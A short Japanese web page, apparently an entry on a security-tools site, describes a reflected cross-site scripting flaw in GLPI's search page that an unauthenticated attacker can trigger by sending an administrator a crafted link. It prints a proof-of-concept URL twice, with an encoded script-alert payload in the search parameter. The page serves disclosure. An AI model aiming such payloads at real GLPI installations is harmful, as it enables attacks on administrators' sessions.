ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!
コミュニティで最も使われているツールを見つけましょう。
すべてのツールを探索
ツールコレクションを閲覧
認証されていないユーザーは、反射型XSSの脆弱性を悪用するために、GLPI管理者に悪意のあるリンクを提供することができます。このXSSは、管理者がデバッグバーを操作した場合にのみ発動します。
PoC - http://<host>/glpi/front/search.php?globalsearch=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://<host>/glpi/front/search.php?globalsearch=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
参考: